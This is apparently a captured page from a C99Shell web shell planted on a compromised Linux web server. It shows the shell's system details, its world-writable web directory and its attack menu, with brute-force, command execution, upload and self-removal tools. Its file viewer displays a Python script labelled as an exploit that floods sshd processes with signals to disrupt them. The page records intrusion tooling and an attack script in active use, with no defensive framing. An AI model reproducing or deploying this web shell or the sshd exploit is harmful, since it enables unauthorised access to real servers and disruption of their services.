!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.18.0. PHP/7.4.29 

uname -a: Linux ip-172-31-23-220 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/blog/   drwxrwxrwx
Free 39.76 GB of 48.28 GB (82.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     dhanush2.php (995 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
import os
import signal
import time
import subprocess

# Get SSHD process ID
def get_sshd_pid():
    try:
        pids = subprocess.check_output(["pidof", "sshd"]).decode().strip().split()
        return [int(pid) for pid in pids]
    except subprocess.CalledProcessError:
        print("[!] sshd process not found!")
        return []

# Trigger signal flooding
def race_condition_exploit(sshd_pids):
    print(f"[+] Targeting sshd PIDs: {sshd_pids}")
    while True:
        for pid in sshd_pids:
            os.kill(pid, signal.SIGCHLD)  # Simulate child process exit
            os.kill(pid, signal.SIGUSR1)  # Arbitrary signal to disrupt execution
        time.sleep(0.001)  # Fine-tune the timing

if __name__ == "__main__":
    sshd_pids = get_sshd_pid()
    if not sshd_pids:
        exit(1)
    
    print("[+] Launching exploit...")
    try:
        race_condition_exploit(sshd_pids)
    except KeyboardInterrupt:
        print("[!] Exploit stopped.")

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0051 ]--